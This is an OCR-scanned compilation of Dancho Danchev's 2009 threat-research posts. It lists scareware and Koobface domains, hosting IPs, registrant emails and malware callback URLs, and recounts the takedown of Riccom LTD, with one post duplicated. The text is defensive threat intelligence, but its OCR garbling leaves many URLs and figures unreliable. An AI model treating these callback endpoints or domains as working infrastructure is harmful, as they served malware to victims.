[21]From Ukraine with Scareware Serving Tweets, Bogus LinkedIn/Scribd Accounts, and Black- 
hat SEO Farms 

[22]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at Blogspot 


This post has been reproduced from [23]Dancho Danchev’s blog. 


_ btp://adanchev .blogepot .con/2008/12/celebrity-thened-scarevare~ campaign. bial 
_http://adanchev blogspot .con/2009/41/koobface- botnet starte~serving-client. ital 

_hep://wvy. bobbear.con/blue~chip- financial- corporation hea] 

| ftp://eey- bobbear co, uk/prenier~builcing” company stall 

| hetp://wvy.bobbesr.co.uk/24-apanish-realty. neal 

|" http: //amw.virustotal..con/analisis/Taaff 181 bbe2008<Toea0abi4Gfbibdabibal2 i674 48e861f6v8587#ASb6tT-12603 
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5.12.5 A Diverse Portfolio of Fake Security Software - Part Twenty Four 
(2009-12-21 22:58) 
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Good traditions are not meant to be broken, in particular the "Diverse Portfolio of Fake 
Security Software" series. And with [1]scareware losses to customers already (conservatively) 
estimated at $150 million, combined with the overwhelming evidence of scareware becoming 
the monetization method of choice for the majority of cybercriminals gathered throughout the 
entire year - in 2010 we'll see the peak of a fully matured business model that’s offering one 
of the highest payout rates within the underground marketplace. 


How can this underground business model be undermined? By hitting the"beehive" rather than 
hitting the campaign of particular "bee", and by disrupting the monetization flow ultimately 
leaving the "beehive" with hundreds of thousands of "bees" actively infecting without the 
opportunity to collect the cash flaw, thereby putting them in a position where the "beehive" 
becomes unable to pay the commissions to the "bees" at the first place. 


Moreover, raising awareness on the most efficient and profitable monetization tactic used by 
cybecriminals in the face of scareware ([2]The Ultimate Guide to Scareware Protection), is 
crucial for filling in the gaps, since in its current form, scareware is driven exclusively by social 
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engineering tactics and aggressive traffic hijacking campaigns. 


What’s to come in 2010 anyway? It’s the culmination of an year and half research. 
Stay tuned folks! 


¥ VSCodec PRO 


Purchase Downlocod Support 


User feedback 


Video revives 


Customers Support 


The following scareware domains have been recently observed in active campaigns online: 


78.46.254.18[3]/96.9.180.102 - AS24940 -HETZNER-AS Hetzner Online AG RZ/AS21788 
BurstNet Technologies, Inc. 
3-scanner .com 

5-scanner .com 

9-scanner .com 

aa-scan .com 
antispy-microsoft0 .cn 
antispy-microsoft2 .cn 
aspywarescan .com 
av-scannerr .com 
av-scannerw .com 
av-scannerx .com 
av-scannery .com 
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av-scannerz .com 
bb-scan .com 
bspywarescan .com 
cspywarescan .com 
fspywarescan .com 
internetdefencei .com 
ispywarescan .com 
malware-destroy01 .com 
malware-destroy03 .com 
malware-destroy09.com 
malwarescannere. com 
malwarescannerq .com 
malwarescannerr .com 
malwarescannert .com 
malwarescannerw .com 
pc-securityv .com 
pc-securityv2 .com 
pc-securityv4 .com 
removespywared .com 
removespywarek .com 
removespywarel .com 
removespywarem .com 
removespywaren .com 
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securitybugfixv9 .com 
spyware-remove0O .com 
spyware-remove9 .com 
spyware-removeb .com 
spyware-removee .com 
spyware-removen .com 
titan-antivirus .com 
titan-antivirusv .com 
titan-antivirusy .com 
titan-antivirusz .com 
titan-scanner .com 
trustedmicrosoftscan0O .com 
trustedmicrosoftscan8 .com 
ultimatepcscanb .com 
ultimatepcscano .com 
ultimatepcscanp .com 
ultimatepcscanr .com 
windows-antivirusO .com 
windows-antivirus11 .com 
windows-antivirus2 .com 
windows-antivirus4 .com 


= pay-cc24.com 


Welcome to our Customer Support page! 


tn cur filling 


Refund Reporting form 


trawd Reporting form. 


Consumer Support Contact Information 


Mowars: 
24 hows 2 Gay, 7 Gays a reek, 265 cays 2 year 
Phone Number: 

Awaladie only for authorzed customers 
Support emai: 
gunport@oay-cc24.co 
Baz s 


2925 


windows-antivirus8 .com 
win-pro-update .cn 


The scareware domains portfolio profiled in the "[4]Celebrity-Themed Scareware Campaign 
Abusing DocStoc and Scribd" post parked at 193.104.110.50, has many new typosquatted 
additions to it: 


. a VSCodec PRO 


Home Purchase Downlood Support 
Billing Info 
Fest name F 
ee f @ $49,95 VSCodecPRO 
Address [ Three Years Lxense 
cay: | 
sate:[Seectvtte af 
ZP Code: | 
Country: [Unted Sees 
Prone [ D ¥; ® 
cont a Finci 
Credit Card Info ‘s = os : = - ™ - 


KI 


193.104.110.50 - AS50073/SOFTNET Software Service Prague s.r.o. 
10-open-davinci .com 
advanced-virusremover2009 .com 
advancedvirus-remover2009 .com 
advanced-virus-remover2009 .com 
advancedvirusremover-2009 .com 
advanced-virusremover-2009 .com 
advanced-virus-remover-2009 .com 
advanced-virus-remover2010 .com 
advanced-virus-remover-2010 .com 
advanced-virus-remover2011 .com 
advanced-virus-remover-2011 .com 
avrdownnew6 .com 


2926 


avrdownnew8 .com 
avrdownnew9 .com 
bastaproject .com 
buy-internet-security2010 .com 
coolcount1 .com 
coolcount2 .com 
coolprojectnew .com 
downloadavr10 .com 
downloadavr11 .com 
downloadavr12 .com 
downloadavr13 .com 
downloadavr14 .com 


3) Total br jur4ors 
wD security 


DOWNLOAD 
Wi 


RIGHT NO 


downloadavr15 .com 
downloadavr20 .com 
downloadavr5 .com 
downloadavr6 .com 
downloadavr7 .com 
downloadavr8 .com 
downloadavr9 .com 
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greatcrypt .com 
megacryptnew .com 
pc-scanner2010 .biz 
pc-scanner-2010 .biz 
pcscanner2010 .com 
pc-scanner2010 .com 
pcscanner-2010 .com 
pc-scanner-2010 .com 
pc-scanner2010 .net 
pc-scanner2010 .org 
pc-scanner-2010 .org 
pc-scanner-2011 .biz 
pc-scanner-2011 .org 
pc-scanner-2012 .com 
pc-scanner-2012 .net 
pc-scanner-2012 .org 
testavrdown .com 
vscodec-pro .net 
vsproject .net 
white-xxx-tube .com 
white-xxxx-tube .com 
xxx-white-tube .net 


The Koobface gang has not only migrated the domains the weren’t suspended from the 


previous "[5]Koobface Botnet’s Scareware Business Model - Part Two" post, but has also 
introduced new ones on the new IPs: 
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193.169.235.5/93.174.95.191 - AS32181/ASN-CQ-GIGENET ColoQuest/GigeNet ASN 
goboldscan .com - Email: gleyersth@gmail.com 
godeckscan .com - Email: quetotator@gmail.com 
godirscan .com - Email: momorule@gmail.com 
godotscan .com - Email: gleyersth@gmail.com 
gopullscan .com - Email: stgeyman@gmail.com 
gorootscan .com - Email: stgeyman@gmail.com 
goscanbold .com - Email: gleyersth@gmail.com 
goscandot .com - Email: gleyersth@gmail.com 
goscanhand .com - Email: quetotator@gmail.com 
goscanmend .com - Email: gleyersth@gmail.com 
goscanmoth .com - Email: gleyersth@gmail.com 
goscanpull .com - Email: stgeyman@gmail.com 
goscanref .com - Email: quetotator@gmail.com 
goscanrest .com - Email: quetotator@gmail.com 
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goscanroom .com - Email: gleyersth@gmail.com 
goscanroot .com - Email: stgeyman@gmail.com 
goscantype .com - Email: stgeyman@gmail.com 


Some of these are actively redirecting to another recently updated .cn portfolio, once again 
maintained by the Koobface gang, parked at 193.169.235.6 - AS32181 - ASN-CQ-GIGENET 
ColoQuest/GigeNet ASN: 

193.169.235.6 - AS32181 - ASN-CQ-GIGENET ColoQuest/GigeNet ASN 

diwehym .cn - Email: spscript@hotmail.com 

dizymhe .cn - Email: spscript@hotmail.com 

docigpe .cn - Email: spscript@hotmail.com 

dofawi .cn - Email: spscript@hotmail.com 

domreha .cn - Email: spscript@hotmail.com 

donlaci .cn - Email: spscript@hotmail.com 

donqgaw .cn - Email: spscript@hotmail.com 

dopelsi .cn - Email: spscript@hotmail.com 
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doquza .cn - Email: spscript@hotmail.com 
doqypku .cn - Email: spscript@hotmail.com 
egikap .cn - Email: spscript@hotmail.com 
enegoys .cn - Email: spscript@hotmail.com 
eneybis .cn - Email: spscript@hotmail.com 
enoihup .cn - Email: spscript@hotmail.com 
enygoji .cn - Email: spscript@hotmail.com 
enyuwip .cn - Email: spscript@hotmail.com 
epafij .cn - Email: spscript@hotmail.com 
epaumov .cn - Email: spscript@hotmail.com 
epiadyl .cn - Email: spscript@hotmail.com 
epiecgy .cn - Email: spscript@hotmail.com 
g-antivirus .com - Email: mhbilate@gmail.com 
iantiviruspro .com - Email: broderma@gmail.com 
iantivirus-pro .com - Email: feetecho@gmail.com 
iav-pro .com - Email: mcgettel@gmail.com 
in4iv .com - Email: momaust@gmail.com 
inb6ct .com - Email: jobumb@gmail.com 
inb6ik .com - Email: jobumb@gmail.com 
jyqhoki .cn - Email: spscript@hotmail.com 
jyseny .cn - Email: spscript@hotmail.com 
jywmer .cn - Email: spscript@hotmail.com 
jyzixme .cn - Email: spscript@hotmail.com 
jyzuju .cn - Email: spscript@hotmail.com 
kabivu .cn - Email: spscript@hotmail.com 
kacupyb .cn - Email: spscript@hotmail.com 
kajefu .cn - Email: spscript@hotmail.com 
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albestdefence.com 


bestscan21.com A 


clean-virus08.cn 


lenovosecurityO1.cn 


lenovosecurityS1.cn 


mstopantivirus.cn 


nextgenprotection33.cn 


onlinescannerg0.com 


\ 
pro-scanner40.cn A $8.198.160.57 


removepcthreats2.cn 


88.198.0.0/16 AS gy 8524940 


A static. 88-198-160-57 clients your-server.de 


Superprotection3.com 
top2009security.cn 
top2009securityt.cn 
top2009securitwicn 

update-protection-zi.cn 
update-protection-24.cn 


update-protection-26.cn 


Another portfolio is parked at 193.169.13.200, our "dear friends" AS5577 - ROOT eSolutions: 
antivirusonlinegames .com - Email: saracbrown@dodgit.com 
antivirussoftblog .com - Email: sharonldixon@trashymail.com 
antyflutool .net - Email: joycerfriley@dodgit.com 

an-ty-virusnow .net - Email: carriedlawrence@gmail.com 
an-ty-virus-tool .com - Email: marydgallo@pookmail.com 
bigvirusscan .com - Email: marydgallo@pookmail.com 
freeantyvirusservice .com - Email: alejandrojmckinney@gmail.com 
mysecuritysoft .net - Email: mildredkbaker@mailinator.com 
nationalsecuritydirect .com - Email: loisjstillings@trashymail.com 
newantispywaresoft .com - Email: junejobrubaker@trashymail.com 
newantyvirus .net - Email: johnneponder@gmail.com 
progressmovement .com - Email: christinegcarroll@trashymail.com 
readonlinestories .com - Email: lawrencemtimms@dodgit.com 
removevirusgadget .com - Email: benjaminmdickerson@gmail.com 
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scannetradio .com - Email: robertcle@dodgit.com 
securityonlinecopy .net - Email: saraldillard@trashymail.com 
securitysoftstore .com - Email: anthonybpierce@trashymail.com 
securitytoolsuser .com - Email: kyongabrantner@gmail.com 
securitytoolsuser .net - Email: jamessvaughn@dodgit.com 
securityutilityshop .net - Email: fletchererodriguez@gmail.com 
spacetrafficsafety .com - Email: bettycyeates@pookmail.com 
superprotectionact .com - Email: darnellbhouse@pookmail.com 
supersafetysolutions .com - Email: georgekhorn@pookmail.com 
thebillingaol .com - Email: justindsmith@trashymail.com 
theprogressclub .com - Email: jerrysfiniayson@pookmail.com 
theremovevirustool .com - Email: dalemharman@dodgit.com 
virusread .com - Email: robertcjones@pookmail.com 
yourfraudprotection .com - Email: michelledglover@dodgit.com 
yoursafetysearch .com - Email: michelledglover@dodgit.com 


Da Vinci \ Put Da Vinci's strong protection to work 


encryption system protecting your private data! 


@ Home = Gallery & BuyNow © Company Support o Contact us 


Wed)’ Bowertul, 


Easy tojuse 
encryptionisystem 9 


@ Home GB Gatery & Baynow & Company © Suppcet @ Contactus 


Copyngtt © Open DaVing. Inc 2005-2008 


193.104.153.245 - AS5577 - ROOT eSolutions 

antivirusonlinecasino .com - Email: alfonzomhopps@mailinator.com 
anti-virustoday .net - Email: elishaebeauregard@pookmail.com 
an-ty-flu-service .com - Email: edwinwmartinez@trashymail.com 
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bereadonline .com - Email: jeanvfriddle@trashymail.com 
bestantyspyware .net - Email: ralphyjackson@pookmail.com 
bodyscanllc .com - Email: ralphyjackson@pookmail.com 
contraspywaresoft .com - Email: josephinetmarenco@dodgit.com 
newantyvirustool .net - Email: josephinetmarenco@dodgit.com 
remove-virus-tool .com - Email: maryprobinson@pookmail.com 
scaninternetradio .com - Email: maryprobinson@pookmail.com 
securityonlinegames .net - Email: clementeanderson@pookmail.com 


89.248.160.153 - AS29073/ECATEL-AS , Ecatel Network 
do-fastscannow .net - Email: gkook@checkjemail.nl 
do-speedscan .net - Email: gkook@checkjemail.nl 
do-speedscan-search .com - Email: gkook@checkjemail.n! 
iwillcheck-it .com - Email: gkook@checkjemail.nl 
systemscan-check .net - Email: gkook@checkjemail.nl 
zguarddata .com - Email: gkook@checkjemail.n! 


193.106.32.10 - TELECOMPO, spol. s ro. 

antyspywaretoday .net - Email: willistbatiste@dodgit.com 
an-ty-virusblog .net - Email: brendapwhite@dodgit.com 
securitysoftshop .net - Email: milagrosrporter@pookmail.com 
theantispywaresoft .com - Email: danhjones@gmail.com 


88.198.103.129 - AS24940/HETZNER-AS Hetzner Online AG RZ 
antispyscanb4 .com 

onlinescanner70 .com 

onlinescanner80 .com 

pro-antivir03 .com 

scannerintheinternetO .com 

windowscanner21 .com 

windowscanner51 .com 
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nd Enter you username and as 
password to submit = 


Download NOW! 


08-10 10:14 | Lemon for example: arohectnn 2009-10-14 | You are welcomet 
I have 2 problern. Cass: Fle, Type: 2. Cate: 06-10 We are glad to present you our mew product 
Fic Protection CURE 


- Downkaed § and enjoy safe surfing. 
22-09 1558 [eae «ety protection cube virus = 


mena noeGnena BADNET - 2 - 22-09-2001 download update computer internet 
wae sas blogs need nee update download 
protection cube 


computer internet download 


88.198.160.57 - AS24940/HETZNER-AS Hetzner Online AG RZ 
a7bestdefence .com 
antispyscanb4 .com 
best-antivirus99 .com 
onlinescanner70 .com 
onlinescanner80 .com 
pro-antivirO3 .com 
pro-antivirus99 .com 
scannerintheinternetO .com 
top10defenceb .com 
top10defencef .com 
windowscanner21 .com 
windowscanner51 .com 


Sample detection rate: [6]SetupbAdvancedVirusRemover.exe; [7]Install.exe; [8]lnstall(1).exe 


Upon execution the samples phone back to: 
downloadavr20 .com/loads.php?code=O0ONULL 
downloadavr20 .com/dfghfghgfj.dll 

downloadavr20 .com/cgi-bin/download.pl?code=OOONULL 
testavrdown .com/cgi-bin/get.pl?I=OOONULL 
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Sample detection rate for the dropped files: [9]SetupIS2010.exe; [10]dfghfghgfj.dll 


Hitting them where it hurts most - [11]the monetization flow - since [12]2007. Domain 
suspension is in progress, the ISPs have been notified as usual. 


Related posts: 

[13]The Ultimate Guide to Scareware Protection 

[14]A Diverse Portfolio of Fake Security Software - Part Twenty Three 
[15]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[16]A Diverse Portfolio of Fake Security Software - Part Twenty One 
[17]A Diverse Portfolio of Fake Security Software - Part Twenty 
[18]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[19]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[20]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[21]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[22]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[23]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[24]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[25]A Diverse Portfolio of Fake Security Software - Part Twelve 
[26]A Diverse Portfolio of Fake Security Software - Part Eleven 
[27]A Diverse Portfolio of Fake Security Software - Part Ten 

[28]A Diverse Portfolio of Fake Security Software - Part Nine 

[29]A Diverse Portfolio of Fake Security Software - Part Eight 

[30]A Diverse Portfolio of Fake Security Software - Part Seven 
[31]A Diverse Portfolio of Fake Security Software - Part Six 

[32]A Diverse Portfolio of Fake Security Software - Part Five 

[33]A Diverse Portfolio of Fake Security Software - Part Four 

[34]A Diverse Portfolio of Fake Security Software - Part Three 
[35]A Diverse Portfolio of Fake Security Software - Part Two 
[36]Diverse Portfolio of Fake Security Software 


This post has been reproduced from [37]Dancho Danchev’s blog. 


ep:/ logs. zdnetcon/securiny/2p-5140 
| http://blogs.znet.con/security/?p-4297 

| netp://arate. blogger .con/ goog, 1261424059849 

_netp:/ /adanchev. blogspot .con/2009/2/celebrity-thened-scarevare-canpaign heal 
_ hetp://adanchev.blogepot con/2000/11/koobface-botnets~scarevare-business. html 


ttp://www.virustotal.com/analisis/756be7ec6dd802799f 6c1c1be0721cfdbc39b91014644f4fdc5d21af824a47a6- 12614 


0. http://wuw.virustotal . com/analisis/8ccf2ce40d2dfa2f 2655394438c21a96179f 17e3f f7d2a6b96bb38476c212010- 12614 
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11. http://ddanchev. blogspot .com/2007/10/russian-business-network.htm 
12. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 
13. http://blogs.zdnet .com/security/?p=429 


ttp://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security_27.htm 


15. http://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security.htm 
16. http://ddanchev. blogspot .com/2009/06/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/05/diverse-portfolio-of-fake-security.htm 


17 
ttp://ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.htm 


19. http://ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/03/diverse-portfolio-of-fake-security_31.htm 


21. http://ddanchev. blogspot .com/2009/03/diverse-portfolio-of-fake-security.htm 
22. http://ddanchev. blogspot .com/2009/02/diverse-portfolio-of-fake-security.htm 


23 


ttp://ddanchev. blogspot .com/2009/01/diverse-portfolio-of-fake-security.htm 


. http://ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.htm 
25 

ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_28.htm 

ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.htm 

. http://ddanchev. blogspot . com/2008/10/diverse-portfolio-of-fake-security_16.htm 
29, 

ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_30.htm 

ttp://ddanchev. blogspot .com/2008/09/diverse-portfolio-of-fake-security_24.htm 


32. http://ddanchev. blogspot . com/2008/09/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


35. http://ddanchev. blogspot . com/2008/08/diverse-portfolio-of-fake-security.htm 
36. http://ddanchev. blogspot . com/2007/12/diverse-portfolio-of-fake-security.htm 


37 


ttp://ddanchev. blogspot .com/ 
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5.12.6 Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
(2009-12-22 10:49) 


C&C ARCHITECTURE 


Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 


protocol 
Pos Retrieve commands and 
v4 1 KOOBFACE zombie computers’ IP 
Pe ddresses from C&C si 
Y KOOBFACE C&C Lara 
fe ee 
rs / J 
Retrieve commands from C&C t 
a 
ae: i 
en 
4) 
Pe ~ = Kootdace pomive 
Retrieve subsequent oepyan 
commands and — - 
2 components using zombies 
== aS proxy 
Affected User Alerter | ee 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry? the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted* 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the maiware’s domain activities 


(2009-07-22 20:24:17) 
#We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 


#for the help in bug fixing, researches and documentation for our software. 


Last week, Josh Kirkwood, Network Engineer at Blue Square Data Group Services Limited, with 
whom I’ve been keeping in touch regarding the blackhat SEO activity courtesy of the Koobface 
gang, and actual [1]Koobface botnet activity that’s been taking place there for months, pinged 
me with an interesting email - "Riccom are now gone" ([2]AS29550). He also pinged the folks 
at [3]hpHosts in response to their posts once again emphasizing on [4]the malicious activity 
taking place there. 


Since I’ve been analyzing Riccom LTD activity in the context of "in-the-wild" blackhat 
SEO campaigns launched by the Koobface gang, followed by establishing direct Koobace 
botnet connections, as well as sharing data with Josh, Riccom LTD clearly deserves a brief 
retrospective of the malicious activity that took place there. 


Malicious activity I’ve been analyzing since August, 2009: 


¢ August 06 - scareware parked at 91.212.107.5 analyzed in "[5]Blackhat SEO Campaign 
Hijacks U.S Federal Form Keywords, Serves Scareware" 


2938 


¢ August 10 - more scareware introduced at 91.212.107.5 analyzed in "[6]U.S Federal Forms 
Blackhat SEO Themed Scareware Campaign Expanding" 


¢ August 18 - scareware domains continue getting introduced at 91.212.107.5, analyzed in 
"[7]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign" 


¢ August 19 - Actual [8]Koobface command and control server parked within BlueConnex’s 
ASN, they take action against 85.234.141.92 - "Three hours after notification, Blue Square 
Data Group Services Limited ensures that "the customer has been disconnected perma- 
nently". It’s a fact. All of Koobface worm’s campaigns currently redirect to nowhere." 


¢ September 14 - the [9]malvertising attack at the web site of the New York Times, not only 
used a redirector that was simultaneously pushed by Koobface-infected host hosted on 
an [10]IP known to be managed by the gang’s blackhat SEO team ,but also, the actual 
scareware domain used relied on Riccom LTD hosting again at 91.212.107.103 


¢ September 16 - 91.212.107.103 remains the [11]most widely abused IP hosting scareware 
served by the Koobface botnet. Action is taken again the entire .info tld domain portfolio, 
the domains are suspended within a 48 hours period of time courtesy of AFILIAS. 


* November 11 - cat and mouse game between the company, me, and the Koobface 
gang is taking place, now that a connection between the Koobface gang and the Ba- 
hama botnet has been clearly established. [12]New scareware domains are introduced at 
91.212.107.103, as well as at the still active [13]AS44042 ROOT eSolutions. The Koobface 
[14]gang once again proves it "knows my name" by typosquatting domains and register- 
ing them with typosquatted variants of my name (pancho-2807 .com is registered to Pan- 
cho Panchev, pancho.panchev@gmail.com, followed by rdr20090924 .info registered to 
Vancho Vanchev, vanchovanchev@mail.ru). Upon notification 91.212.107.103 has been 
taken offline courtesy of Blue Square Data Group Services Limited. 


¢ November 17 - A week later the gang [15]resumes operations at the same Riccom LTD 
IP - "Tuesday, November 17, 2009: Koobface is resuming scareware (Inst _312s2.exe) 
operations at 91.212.107.103 which was taken offline for a short period of time. ISP has 
been notified again". 


Clearly, in terms of cybercrime, especially one that’s monetizing an asset with high liquidity 
such as scareware, "better late than never" doesn’t seem to sound very appropriate. 


Image courtesy of TrendMicro’s [16]The Heart of Koobface - C &C and Social Network 
Propagation report. 


Related Koobface research published in 2009: 

[17]Koobface Botnet Starts Serving Client-Side Exploits 
[18]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model - Part One 
[21]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[22]New Koobface campaign spoofs Adobe’s Flash updater 
[23]Social engineering tactics of the Koobface botnet 
[24]Koobface Botnet Dissected in a TrendMicro Report 
[25]Movement on the Koobface Front - Part Two 
[26]Movement on the Koobface Front 
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[27]Koobface - Come Out, Come Out, Wherever You Are 
[28]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [29]Dancho Danchev’s blog. 


. http: //twitter.com/danchodanchev/status/6549021186 


ttp://www.ris.ripe.net/cgi-bin/lg/index.cgi?rrc=RRCOO1k&query=1kharg=91.212.107 .0%2F24 
. http: //hphosts. blogspot .com/2009/12/euroconnexblueconnex- boots-riccom-ltd.htm 

. http: //ddanchev. blogspot .com/2009/08/blackhat-seo-campaign-hijacks-us.htm 

. http: //ddanchev. blogspot .com/2009/08/us-federal-forms-blackhat-seo-themed. htm 


. http: //ddanchev. blogspot .com/2009/08/movement-on-koobface-front-part-two.htm 


. http: //ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features.htm 
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. http: //ddanchev.blogspot .com/2009/08/dissecting- ongoing-us-federal-forms.htm 
11. http: //ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.htm 
12. http: //ddanchev.blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
13. http: //ddanchev. blogspot .com/2009/08/us-federal-forms-blackhat-seo-themed.htm 
14. http: //ddanchev.blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
15. http: //ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.htm 
16. 
17. http: //ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.htm 
18. http: //ddanchev.blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
19. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.htm 
20. http: //ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business.htm 
21. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
22. http://blogs.zdnet .com/security/?p=4594 

. http: //content.zdnet .com/2346-12691_22-352597 .htm 
24. http: //ddanchev. blogspot .com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
25. http: //ddanchev. blogspot .com/2009/08/movement- on-koobface-front-part-two.htm 
26. http://ddanchev. blogspot .com/2009/08/movement-on-koobface-front .htm 
27. http://ddanchev. blogspot .com/2009/07/koobface-come-out-come-out-wherever-you.htm 
28. http: //ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter .htm 
29. http://ddanchev.blogspot.com/ 


N 
WwW 


5.12.7 Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
(2009-12-22 10:49) 
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C&C ARCHITECTURE 

Compared with the complex C&C architecture of the Storm, WALEDAC, and DOWNAD botnets, the KOOBFACE C&C 
infrastructure is very basic. It only consisted of infected nodes and C&C domains that used HTTP as its communication 
protocol 


Retrieve commands and 
1 KOOBFACE zombie computers’ IP 


resses from C&C “ 
KOOBFACE C&C it be eels 
yr pron 
Retrieve commands from C&C if t 
/ 
gt rc “i Kocttace tomtee 
Retrieve subsequent ~ a at 
2 commands and ~—— = 
_E-components using zombies 
~S a as proxy 
Affected User Ale tee | oes 
Figure 40. KOOBFACE C&C prior to July 19, 2009 Figure 41. Updated KOOBFACE C&C as of July 19, 2009 


This simplistic C&C approach is, of course, very vulnerable to takedowns. After several KOOBFACE C&C takedown 
attempts initiated by Intemet service providers (ISPs) and members of the security industry,’ the KOOBFACE gang 
realized the need for a more robust C&C infrastructure. Thus, on July 19, 2009, the KOOBFACE writers implemented 
a new C&C architecture that involved the use of proxy nodes to provide redundancy and to improve the survivability of 
their C&C should another takedown be attempted‘ 


A few days after the new KOOBFACE C&C infrastructure was implemented, the botnet was seen inserting a message 
(see below) for one of the security researchers tracking the malware's domain activities 


(2009-07-22 20:24:17) 


#We express our high gratitude to Dancho Danchev (http://ddanchev.blogspot.com) 


#for the help in bug fixing, researches and documentation for our software. 


Last week, Josh Kirkwood, Network Engineer at Blue Square Data Group Services Lim- 
ited, with whom I’ve been keeping in touch regarding the blackhat SEO activity courtesy of 
the Koobface gang, and actual [1]Koobface botnet activity that’s been taking place there for 
months, pinged me with an interesting email - "Riccom are now gone" ([2]AS29550). He also 
pinged the folks at [3]hpHosts in response to their posts once again emphasizing on [4]the 
malicious activity taking place there. 


Since I’ve been analyzing Riccom LTD activity in the context of "in-the-wild" blackhat 
SEO campaigns launched by the Koobface gang, followed by establishing direct Koobace 
botnet connections, as well as sharing data with Josh, Riccom LTD clearly deserves a brief 
retrospective of the malicious activity that took place there. 


Malicious activity I’ve been analyzing since August, 2009: 
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¢ August 06 - scareware parked at 91.212.107.5 analyzed in "[5]Blackhat SEO Campaign 
Hijacks U.S Federal Form Keywords, Serves Scareware" 


¢ August 10 - more scareware introduced at 91.212.107.5 analyzed in "[6]U.S Federal Forms 
Blackhat SEO Themed Scareware Campaign Expanding" 


¢ August 18 - scareware domains continue getting introduced at 91.212.107.5, analyzed in 
"[7]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign" 


¢ August 19 - Actual [8]Koobface command and control server parked within BlueConnex’s 
ASN, they take action against 85.234.141.92 - "Three hours after notification, Blue Square 
Data Group Services Limited ensures that "the customer has been disconnected perma- 
nently". It’s a fact. All of Koobface worm’s campaigns currently redirect to nowhere." 


¢ September 14 - the [9]malvertising attack at the web site of the New York Times, not only 
used a redirector that was simultaneously pushed by Koobface-infected host hosted on 
an [10]IP known to be managed by the gang’s blackhat SEO team ,but also, the actual 
scareware domain used relied on Riccom LTD hosting again at 91.212.107.103 


¢ September 16 - 911.212.107.103 remains the [11]most widely abused IP hosting scareware 
served by the Koobface botnet. Action is taken again the entire .info tld domain portfolio, 
the domains are suspended within a 48 hours period of time courtesy of AFILIAS. 


¢ November 11 - cat and mouse game between the company, me, and the Koobface 
gang is taking place, now that a connection between the Koobface gang and the Ba- 
hama botnet has been clearly established. [12]New scareware domains are introduced at 
91.212.107.103, as well as at the still active [13]AS44042 ROOT eSolutions. The Koobface 
[14]gang once again proves it "knows my name" by typosquatting domains and register- 
ing them with typosquatted variants of my name (pancho-2807 .com is registered to Pan- 
cho Panchev, pancho.panchev@gmail.com, followed by rdr20090924 .info registered to 
Vancho Vanchev, vanchovanchev@mail.ru). Upon notification 91.212.107.103 has been 
taken offline courtesy of Blue Square Data Group Services Limited. 


¢ November 17 - A week later the gang [15]resumes operations at the same Riccom LTD 
IP - "Tuesday, November 17, 2009: Koobface is resuming scareware (Inst _312s2.exe) 
operations at 91.212.107.103 which was taken offline for a short period of time. ISP has 
been notified again". 


Clearly, in terms of cybercrime, especially one that’s monetizing an asset with high liquidity 
such as scareware, "better late than never" doesn’t seem to sound very appropriate. 


Image courtesy of TrendMicro’s [16]The Heart of Koobface - C &C and Social Network 
Propagation report. 


Related Koobface research published in 2009: 
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[17]Koobface Botnet Starts Serving Client-Side Exploits 
